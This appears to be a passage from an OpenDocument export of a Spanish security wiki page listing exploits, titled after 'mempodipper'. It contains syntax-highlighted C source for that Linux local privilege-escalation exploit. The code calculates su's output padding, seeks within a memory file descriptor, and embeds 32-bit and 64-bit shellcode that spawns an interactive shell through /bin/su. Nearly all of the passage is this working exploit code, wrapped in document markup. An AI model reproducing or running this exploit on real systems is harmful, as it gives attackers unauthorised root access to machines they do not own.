text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">,</text:span> address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Calculating su padding.<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/>FILE <text:span text:style-name="highlight_sy0">*</text:span>command <text:span text:style-name="highlight_sy0">=</text:span> popen<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_st0">"su this-user-does-not-exist 2&gt;&amp;1"</text:span><text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_st0">"r"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw4">char</text:span> result<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">256</text:span><text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/>result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tab/><text:tab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result<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_nu0">256</text:span><text:span text:style-name="highlight_sy0">,</text:span> command<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/>pclose<text:span text:style-name="highlight_br0">(</text:span>command<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw4">unsigned</text:span> <text:span text:style-name="highlight_kw4">long</text:span> su_padding <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_br0">(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result<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_st0">"this-user-does-not-exist"</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_sy0">-</text:span> result<text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_sy0">/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sy0">;</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw4">unsigned</text:span> <text:span text:style-name="highlight_kw4">long</text:span> offset <text:span text:style-name="highlight_sy0">=</text:span> address <text:span text:style-name="highlight_sy0">-</text:span> su_padding<text:span text:style-name="highlight_sy0">;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Seeking to offset 0x%lx.<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">,</text:span> offset<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/>lseek64<text:span text:style-name="highlight_br0">(</text:span>fd<text:span text:style-name="highlight_sy0">,</text:span> offset<text:span text:style-name="highlight_sy0">,</text:span> SEEK_SET<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_co2">#if defined(__i386__)</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_co1">// See shellcode-32.s in this package for the source.</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw4">char</text:span> shellcode<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_br0">]</text:span> <text:span text:style-name="highlight_sy0">=</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_st0">"<text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xdb</text:span><text:span text:style-name="highlight_es2">\xb0</text:span><text:span text:style-name="highlight_es2">\x17</text:span><text:span text:style-name="highlight_es2">\xcd</text:span><text:span text:style-name="highlight_es2">\x80</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xdb</text:span><text:span text:style-name="highlight_es2">\xb0</text:span><text:span text:style-name="highlight_es2">\x2e</text:span><text:span text:style-name="highlight_es2">\xcd</text:span><text:span text:style-name="highlight_es2">\x80</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xc9</text:span><text:span text:style-name="highlight_es2">\xb3</text:span>"</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_st0">"<text:span text:style-name="highlight_es2">\x06</text:span><text:span text:style-name="highlight_es2">\xb1</text:span><text:span text:style-name="highlight_es2">\x02</text:span><text:span text:style-name="highlight_es2">\xb0</text:span><text:span text:style-name="highlight_es2">\x3f</text:span><text:span text:style-name="highlight_es2">\xcd</text:span><text:span text:style-name="highlight_es2">\x80</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xc0</text:span><text:span text:style-name="highlight_es2">\x50</text:span><text:span text:style-name="highlight_es2">\x68</text:span><text:span text:style-name="highlight_es2">\x6e</text:span><text:span text:style-name="highlight_es2">\x2f</text:span><text:span text:style-name="highlight_es2">\x73</text:span><text:span text:style-name="highlight_es2">\x68</text:span>"</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_st0">"<text:span text:style-name="highlight_es2">\x68</text:span><text:span text:style-name="highlight_es2">\x2f</text:span><text:span text:style-name="highlight_es2">\x2f</text:span><text:span text:style-name="highlight_es2">\x62</text:span><text:span text:style-name="highlight_es2">\x69</text:span><text:span text:style-name="highlight_es2">\x89</text:span><text:span text:style-name="highlight_es2">\xe3</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xd2</text:span><text:span text:style-name="highlight_es2">\x66</text:span><text:span text:style-name="highlight_es2">\xba</text:span><text:span text:style-name="highlight_es2">\x2d</text:span><text:span text:style-name="highlight_es2">\x69</text:span><text:span text:style-name="highlight_es2">\x52</text:span><text:span text:style-name="highlight_es2">\x89</text:span>"</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_st0">"<text:span text:style-name="highlight_es2">\xe0</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xd2</text:span><text:span text:style-name="highlight_es2">\x52</text:span><text:span text:style-name="highlight_es2">\x50</text:span><text:span text:style-name="highlight_es2">\x53</text:span><text:span text:style-name="highlight_es2">\x89</text:span><text:span text:style-name="highlight_es2">\xe1</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xd2</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xc0</text:span><text:span text:style-name="highlight_es2">\xb0</text:span><text:span text:style-name="highlight_es2">\x0b</text:span><text:span text:style-name="highlight_es2">\xcd</text:span>"</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_st0">"<text:span text:style-name="highlight_es2">\x80</text:span>"</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:span text:style-name="highlight_co2">#elif defined(__x86_64__)</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_co1">// See shellcode-64.s in this package for the source.</text:span><text:line-break/><text:tab/><text:tab/><text:span text:style-name="highlight_kw4">char</text:span> shellcode<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_br0">]</text:span> <text:span text:style-name="highlight_sy0">=</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_st0">"<text:span text:style-name="highlight_es2">\x48</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xff</text:span><text:span text:style-name="highlight_es2">\xb0</text:span><text:span text:style-name="highlight_es2">\x69</text:span><text:span text:style-name="highlight_es2">\x0f</text:span><text:span text:style-name="highlight_es2">\x05</text:span><text:span text:style-name="highlight_es2">\x48</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xff</text:span><text:span text:style-name="highlight_es2">\xb0</text:span><text:span text:style-name="highlight_es2">\x6a</text:span><text:span text:style-name="highlight_es2">\x0f</text:span><text:span text:style-name="highlight_es2">\x05</text:span><text:span text:style-name="highlight_es2">\x40</text:span>"</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_st0">"<text:span text:style-name="highlight_es2">\xb7</text:span><text:span text:style-name="highlight_es2">\x06</text:span><text:span text:style-name="highlight_es2">\x40</text:span><text:span text:style-name="highlight_es2">\xb6</text:span><text:span text:style-name="highlight_es2">\x02</text:span><text:span text:style-name="highlight_es2">\xb0</text:span><text:span text:style-name="highlight_es2">\x21</text:span><text:span text:style-name="highlight_es2">\x0f</text:span><text:span text:style-name="highlight_es2">\x05</text:span><text:span text:style-name="highlight_es2">\x48</text:span><text:span text:style-name="highlight_es2">\xbb</text:span><text:span text:style-name="highlight_es2">\x2f</text:span><text:span text:style-name="highlight_es2">\x2f</text:span><text:span text:style-name="highlight_es2">\x62</text:span><text:span text:style-name="highlight_es2">\x69</text:span>"</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_st0">"<text:span text:style-name="highlight_es2">\x6e</text:span><text:span text:style-name="highlight_es2">\x2f</text:span><text:span text:style-name="highlight_es2">\x73</text:span><text:span text:style-name="highlight_es2">\x68</text:span><text:span text:style-name="highlight_es2">\x48</text:span><text:span text:style-name="highlight_es2">\xc1</text:span><text:span text:style-name="highlight_es2">\xeb</text:span><text:span text:style-name="highlight_es2">\x08</text:span><text:span text:style-name="highlight_es2">\x53</text:span><text:span text:style-name="highlight_es2">\x48</text:span><text:span text:style-name="highlight_es2">\x89</text:span><text:span text:style-name="highlight_es2">\xe7</text:span><text:span text:style-name="highlight_es2">\x48</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xdb</text:span>"</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_st0">"<text:span text:style-name="highlight_es2">\x66</text:span><text:span text:style-name="highlight_es2">\xbb</text:span><text:span text:style-name="highlight_es2">\x2d</text:span><text:span text:style-name="highlight_es2">\x69</text:span><text:span text:style-name="highlight_es2">\x53</text:span><text:span text:style-name="highlight_es2">\x48</text:span><text:span text:style-name="highlight_es2">\x89</text:span><text:span text:style-name="highlight_es2">\xe1</text:span><text:span text:style-name="highlight_es2">\x48</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xc0</text:span><text:span text:style-name="highlight_es2">\x50</text:span><text:span text:style-name="highlight_es2">\x51</text:span><text:span text:style-name="highlight_es2">\x57</text:span><text:span text:style-name="highlight_es2">\x48</text:span>"</text:span><text:line-break/><text:tab/><text:tab/><text:tab/><text:span text:style-name="highlight_st0">"<text:span text:style-name="highlight_es2">\x89</text:span><text:span text:style-name="highlight_es2">\xe6</text:span><text:span text:style-name="highlight_es2">\x48</text:span><text:span text:style-name="highlight_es2">\x31</text:span><text:span text:style-name="highlight_es2">\xd2</text:span><text:span text:style-name="highlight_es2">\xb0</text:span><text:span text:style-name="highlight_es2">\x3b</text:span><text:span text:style-name="highlight_es2">\x0f</text:span><text:span text:style-name="highlight_es2">\x05</text:span>"</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_co2">#else</text:span><text:line-break/><text:span text:style-name="highlight_co2">#error "That platform is not supported."</text:span><text:line-break/><text:span text:style-name="highlight_co2">#endif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Executing su with shellcode.<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/>execl<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_st0">"/bin/su"</text:span><text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_st0">"su"</text:span><text:span text:style-name="highlight_sy0">,</text:span> shellcode<text:span text:style-name="highlight_sy0">,</text:span> NULL<text:span text:style-name="highlight_br0">)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<text:span text:style-name="highlight_kw4">char</text:span> pid<text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">32</text:span><text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab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pid<text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_st0">"%d"</text:span><text:span text:style-name="highlight_sy0">,</text:span> parent_pid<text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;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+] Executing child from child fork.<text:span text:style-name="highlight_es1">\n</text:span>"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:tab/>execl<text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_st0">"/proc/self/exe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sy0">,</text:span> <text:span text:style-name="highlight_st0">"-c"</text:span><text:span text:style-name="highlight_sy0">,</text:span> pid<text:span text:style-name="highlight_sy0">,</text:span> NULL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3::59:24</meta:creation-date>
    <dc:creator>Generated</dc:creator>
    <dc:date>2026-02-19T23::59:24</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>seguridad:enlaces:exploits:mempodipper</dc:title>
  </office:meta>
</office:document-meta>
</file>